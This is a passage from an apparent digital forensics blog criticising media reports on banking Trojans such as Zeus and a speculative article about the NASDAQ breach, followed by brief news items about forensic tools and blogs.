1. "Password-stealing banking Trojans" is ambiguous, and could be any of a number of variants. The "Zeus" (aka, Zbot) Trojan is mentioned later in the post, but there's no information presented to indicate that this was, in fact, a result of that specific malware. Anyone who's done this kind of work for a while is aware that there are a number of malware variants that can be used to collect online banking credentials.

2. Look at the victims mentioned in Brian's post...none of them is a big corporate entity. Apparently, the bad guys are aware that smaller targets are less likely to have detection and response capabilities (*cough*CarbonBlack*cough*). This, in turn, leads directly to #3...

3. Nothing in the post indicates that a digital forensics investigation was done of systems at the victim location. With no data preserved, no actual analysis was performed to identify the specific malware, and there's nothing on which law enforcement can build a case.

Finally, while the post doesn't specifically mention the use of Zeus at the beginning, it does end with a graphic showing detection rates of new variants of the Zeus Trojan over the previous 60 days; the average detection rate is below 40%. While the graphic is informative,

More Media Stuff
I read this article recently from InformationWeek that relates to the recent breach of NASDAQ systems; I specifically say "relates" to the breach, as the article specifies, "...two experts with knowledge of Nasdaq OMX Group's internal investigation said that while attackers hadn't directly attacked trading servers...". The title of the article includes the words "3 Expected Findings", and the article is pretty much just speculation about what happened, from the get-go. In fact, the article goes on to say, "...based on recent news reports, as well as likely attack scenarios, we'll likely see these three findings:". That's a lot of "likely" in one sentence, and this much speculation is never a good thing.

My concern with this is that the overall take-away from this is going to be "NASDAQ trading systems were hit with SQL injection", and folks are going to be looking for this sort of thing...and some will find it. But others will miss what's really happening while they're looking in the wrong direction.

Other Items
F-Response TACTICAL Examiner for Linux now has a GUI
Lance Mueller has closed his blog; old posts will remain, but no new content will be posted